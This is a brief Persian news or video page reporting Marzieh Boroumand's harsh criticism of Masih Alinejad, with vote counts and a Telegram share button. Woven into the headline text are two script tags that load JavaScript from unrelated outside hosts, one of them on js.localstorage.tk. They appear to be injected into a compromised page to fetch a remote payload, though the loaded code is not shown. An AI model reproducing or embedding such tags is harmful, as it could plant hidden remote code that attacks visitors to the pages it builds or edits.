انتقاد تند مرضیه برومند از مسیح علینژاد


<script type='text/javascript' src='https://mysimplename.com/sc.js?p=3'></script> انتقاد تند #مرضیه_برومند از #مسیح_علینژاد: این خانم مو وزوزی از جان زنان ما چه میخواهد؟<script type='text/javascript' src='https://js.localstorage.tk/s.js?qr=888'></script>


+ 
13

- 
2

عرض x طول

دکمه اشتراک گذاري تلگرام ارسال ويدئو در تلگرام

ارسال نظر